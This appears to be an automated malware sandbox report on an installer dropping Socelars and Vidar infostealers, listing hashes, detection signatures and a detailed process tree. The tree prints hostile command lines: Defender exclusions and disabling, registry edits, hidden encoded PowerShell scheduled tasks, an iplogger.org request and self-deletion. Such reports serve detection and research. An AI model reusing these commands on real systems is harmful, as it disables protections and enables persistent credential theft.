Resubmissions

23-09-2021 21:08

210923-zyzyaafbfr 10

22-09-2021 10:40

210922-mqyzssehck 10

22-09-2021 05:21

210922-f114ksecck 10

21-09-2021 05:29

210921-f6zspsgdg2 10

20-09-2021 21:51

210920-1qj3jafed9 10

20-09-2021 19:44

210920-yftswafca9 10

20-09-2021 08:28

210920-kczcasgahr 10

20-09-2021 04:42

210920-fb3acafedj 10

20-09-2021 04:42

210920-fb2zksfecr 10

Analysis

  • max time kernel
    85s
  • max time network
    620s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    20-09-2021 04:40

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.0MB

  • MD5

    73491325fde5366b31c09da701d07dd6

  • SHA1

    a4e1ada57e590c2df30fc26fad5f3ca57ad922b1

  • SHA256

    56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

  • SHA512

    28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 9 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • evasion 1 IoCs

    evasion.

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 47 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 12 IoCs
  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 23 IoCs
  • Checks processor information in registry 2 TTPs 28 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 40 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\sihclient.exe
    C:\Windows\System32\sihclient.exe /cv 1PsfHjy/6UuX87LF/E3WAg.0.2
    1⤵
    • Modifies data under HKEY_USERS
    PID:4128
  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4160
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:5004
      • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC8367590\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3872
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1644
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4796
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3824
          • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun1917b8fb5f09db8.exe
            Sun1917b8fb5f09db8.exe
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:4584
            • C:\Users\Admin\Documents\fHddUHyNOlkhUoq_SfLUfZHc.exe
              "C:\Users\Admin\Documents\fHddUHyNOlkhUoq_SfLUfZHc.exe"
              6⤵
              • Executes dropped EXE
              PID:2584
            • C:\Users\Admin\Documents\1SnnMjSS7uYdKQ6ZGztbKwje.exe
              "C:\Users\Admin\Documents\1SnnMjSS7uYdKQ6ZGztbKwje.exe"
              6⤵
              • Suspicious use of NtCreateProcessExOtherParentProcess
              • Executes dropped EXE
              PID:1672
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                7⤵
                  PID:4648
                • C:\Users\Admin\Documents\1SnnMjSS7uYdKQ6ZGztbKwje.exe
                  C:\Users\Admin\Documents\1SnnMjSS7uYdKQ6ZGztbKwje.exe
                  7⤵
                    PID:6224
                • C:\Users\Admin\Documents\etvzE9YvMR07eW6eKNZAhRc7.exe
                  "C:\Users\Admin\Documents\etvzE9YvMR07eW6eKNZAhRc7.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:4036
                • C:\Users\Admin\Documents\qAcHyWTfl7I9orlfXvPMmItL.exe
                  "C:\Users\Admin\Documents\qAcHyWTfl7I9orlfXvPMmItL.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:828
                  • C:\Users\Admin\Documents\qAcHyWTfl7I9orlfXvPMmItL.exe
                    C:\Users\Admin\Documents\qAcHyWTfl7I9orlfXvPMmItL.exe
                    7⤵
                      PID:6288
                  • C:\Users\Admin\Documents\8K14fxHT6PdRABQDFtxiObfc.exe
                    "C:\Users\Admin\Documents\8K14fxHT6PdRABQDFtxiObfc.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:3420
                    • C:\Windows\SysWOW64\cmd.exe
                      "cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
                      7⤵
                        PID:4668
                        • C:\Users\Admin\AppData\Local\Temp\wwi.exe
                          "wwi.exe"
                          8⤵
                            PID:5168
                          • C:\Users\Admin\AppData\Local\Temp\f.exe
                            "f.exe"
                            8⤵
                              PID:5152
                            • C:\Users\Admin\AppData\Local\Temp\wwl.exe
                              "wwl.exe"
                              8⤵
                                PID:3700
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
                                8⤵
                                  PID:3852
                            • C:\Users\Admin\Documents\DqBaUQ9LyDkRBba0ilPvEodT.exe
                              "C:\Users\Admin\Documents\DqBaUQ9LyDkRBba0ilPvEodT.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:5200
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 276
                                7⤵
                                • Program crash
                                PID:6700
                            • C:\Users\Admin\Documents\VucSUZTbWb5SeFonySDO7KoN.exe
                              "C:\Users\Admin\Documents\VucSUZTbWb5SeFonySDO7KoN.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:2044
                            • C:\Users\Admin\Documents\epLKwv1_bDJM8OtuxcEtBTrU.exe
                              "C:\Users\Admin\Documents\epLKwv1_bDJM8OtuxcEtBTrU.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:3708
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\epLKwv1_bDJM8OtuxcEtBTrU.exe"
                                7⤵
                                  PID:1368
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /T 10 /NOBREAK
                                    8⤵
                                    • Delays execution with timeout.exe
                                    PID:5612
                              • C:\Users\Admin\Documents\huNEVG8jXVnZlYyJzlfhNkgA.exe
                                "C:\Users\Admin\Documents\huNEVG8jXVnZlYyJzlfhNkgA.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4816
                              • C:\Users\Admin\Documents\2V43tIXg0hsPhAkFTcFTOLkL.exe
                                "C:\Users\Admin\Documents\2V43tIXg0hsPhAkFTcFTOLkL.exe"
                                6⤵
                                  PID:1712
                                  • C:\Users\Admin\Documents\2V43tIXg0hsPhAkFTcFTOLkL.exe
                                    "C:\Users\Admin\Documents\2V43tIXg0hsPhAkFTcFTOLkL.exe"
                                    7⤵
                                      PID:3996
                                  • C:\Users\Admin\Documents\lC3dYMJmUTtDuATT_urVCV_d.exe
                                    "C:\Users\Admin\Documents\lC3dYMJmUTtDuATT_urVCV_d.exe"
                                    6⤵
                                      PID:1460
                                      • C:\Users\Admin\AppData\Roaming\6993708.scr
                                        "C:\Users\Admin\AppData\Roaming\6993708.scr" /S
                                        7⤵
                                          PID:1848
                                        • C:\Users\Admin\AppData\Roaming\6588591.scr
                                          "C:\Users\Admin\AppData\Roaming\6588591.scr" /S
                                          7⤵
                                            PID:6012
                                          • C:\Users\Admin\AppData\Roaming\8823615.scr
                                            "C:\Users\Admin\AppData\Roaming\8823615.scr" /S
                                            7⤵
                                              PID:6404
                                          • C:\Users\Admin\Documents\nUEwBwgwX8jpOyhOGhTSnaSa.exe
                                            "C:\Users\Admin\Documents\nUEwBwgwX8jpOyhOGhTSnaSa.exe"
                                            6⤵
                                              PID:6540
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6540 -s 240
                                                7⤵
                                                • Program crash
                                                PID:1540
                                            • C:\Users\Admin\Documents\XShZ7mjN_F8ISrJsKZpubwpw.exe
                                              "C:\Users\Admin\Documents\XShZ7mjN_F8ISrJsKZpubwpw.exe"
                                              6⤵
                                                PID:6740
                                                • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                                  "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                                  7⤵
                                                    PID:4056
                                                  • C:\Program Files (x86)\Company\NewProduct\inst001.exe
                                                    "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
                                                    7⤵
                                                      PID:2100
                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                      7⤵
                                                        PID:6428
                                                    • C:\Users\Admin\Documents\qnuiUXOQT6ptNy4NZhWOS66B.exe
                                                      "C:\Users\Admin\Documents\qnuiUXOQT6ptNy4NZhWOS66B.exe"
                                                      6⤵
                                                        PID:6876
                                                      • C:\Users\Admin\Documents\x5_97cgXZA1tkNm2PTd_eeW2.exe
                                                        "C:\Users\Admin\Documents\x5_97cgXZA1tkNm2PTd_eeW2.exe"
                                                        6⤵
                                                          PID:6856
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 240
                                                            7⤵
                                                            • Program crash
                                                            PID:1912
                                                        • C:\Users\Admin\Documents\YzLfNMIEtSuT8LrauHoYp7fo.exe
                                                          "C:\Users\Admin\Documents\YzLfNMIEtSuT8LrauHoYp7fo.exe"
                                                          6⤵
                                                            PID:7088
                                                          • C:\Users\Admin\Documents\tdlldhCxGRkPCvznuleFN0BU.exe
                                                            "C:\Users\Admin\Documents\tdlldhCxGRkPCvznuleFN0BU.exe"
                                                            6⤵
                                                              PID:6732
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 236
                                                                7⤵
                                                                • Program crash
                                                                PID:2876
                                                            • C:\Users\Admin\Documents\PI4t8dS9gPpwuIbqmIGmaBGP.exe
                                                              "C:\Users\Admin\Documents\PI4t8dS9gPpwuIbqmIGmaBGP.exe"
                                                              6⤵
                                                                PID:6724
                                                                • C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
                                                                  "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
                                                                  7⤵
                                                                    PID:2204
                                                                    • C:\Users\Admin\Documents\e0jIhYrIkdo5NSn4ddIIUs3D.exe
                                                                      "C:\Users\Admin\Documents\e0jIhYrIkdo5NSn4ddIIUs3D.exe"
                                                                      8⤵
                                                                        PID:5760
                                                                      • C:\Users\Admin\Documents\sq4IPFP7eJRX4wMn1l5BSsKe.exe
                                                                        "C:\Users\Admin\Documents\sq4IPFP7eJRX4wMn1l5BSsKe.exe"
                                                                        8⤵
                                                                          PID:6580
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 260
                                                                            9⤵
                                                                            • Program crash
                                                                            PID:1368
                                                                        • C:\Users\Admin\Documents\4LANmLFb6kcRJFoTgokEIWQw.exe
                                                                          "C:\Users\Admin\Documents\4LANmLFb6kcRJFoTgokEIWQw.exe" /mixtwo
                                                                          8⤵
                                                                            PID:5420
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5420 -s 264
                                                                              9⤵
                                                                              • Program crash
                                                                              PID:2420
                                                                          • C:\Users\Admin\Documents\IMmKKo_hhY7vlNd_rfkPsgk0.exe
                                                                            "C:\Users\Admin\Documents\IMmKKo_hhY7vlNd_rfkPsgk0.exe"
                                                                            8⤵
                                                                              PID:696
                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSE64.tmp\Install.exe
                                                                                .\Install.exe
                                                                                9⤵
                                                                                  PID:5856
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS2363.tmp\Install.exe
                                                                                    .\Install.exe /S /site_id "668658"
                                                                                    10⤵
                                                                                      PID:4884
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                        11⤵
                                                                                          PID:3376
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                            12⤵
                                                                                              PID:2840
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                13⤵
                                                                                                  PID:4700
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                    14⤵
                                                                                                      PID:3620
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                        15⤵
                                                                                                          PID:3688
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                    12⤵
                                                                                                      PID:6408
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                        13⤵
                                                                                                          PID:4088
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                            14⤵
                                                                                                              PID:1040
                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                15⤵
                                                                                                                  PID:4892
                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                            12⤵
                                                                                                              PID:3076
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                13⤵
                                                                                                                  PID:5084
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                    14⤵
                                                                                                                      PID:5312
                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                        15⤵
                                                                                                                          PID:3500
                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                    12⤵
                                                                                                                      PID:3664
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                        13⤵
                                                                                                                          PID:4888
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                            14⤵
                                                                                                                              PID:6280
                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                15⤵
                                                                                                                                  PID:2460
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                          11⤵
                                                                                                                            PID:5832
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                              12⤵
                                                                                                                                PID:3204
                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                  13⤵
                                                                                                                                    PID:5492
                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                    13⤵
                                                                                                                                      PID:2784
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                  11⤵
                                                                                                                                    PID:3724
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                      12⤵
                                                                                                                                        PID:1560
                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          13⤵
                                                                                                                                            PID:2844
                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            13⤵
                                                                                                                                              PID:1548
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "gHVXjBalu" /SC once /ST 04:49:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                          11⤵
                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                          PID:1556
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 21:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\wgZVjju.exe\" W8 /site_id 668658 /S" /V1 /F
                                                                                                                                          11⤵
                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                          PID:7112
                                                                                                                                  • C:\Users\Admin\Documents\fCGfCHTBRvaPXWFwQ8U2YCfk.exe
                                                                                                                                    "C:\Users\Admin\Documents\fCGfCHTBRvaPXWFwQ8U2YCfk.exe"
                                                                                                                                    8⤵
                                                                                                                                      PID:5916
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                    7⤵
                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                    PID:2872
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                    7⤵
                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                    PID:6508
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
                                                                                                                              4⤵
                                                                                                                                PID:3800
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun19262b9e49ad.exe
                                                                                                                                  Sun19262b9e49ad.exe
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:4884
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 1588
                                                                                                                                    6⤵
                                                                                                                                    • Program crash
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Enumerates system info in registry
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:5684
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
                                                                                                                                4⤵
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:3956
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun193fda712d9f1.exe
                                                                                                                                  Sun193fda712d9f1.exe
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:1652
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
                                                                                                                                4⤵
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:4008
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun19e4ade31b2a.exe
                                                                                                                                  Sun19e4ade31b2a.exe
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:5072
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\6547369.scr
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\6547369.scr" /S
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:5876
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\3572519.scr
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\3572519.scr" /S
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    PID:5452
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5328301.scr
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5328301.scr" /S
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:956
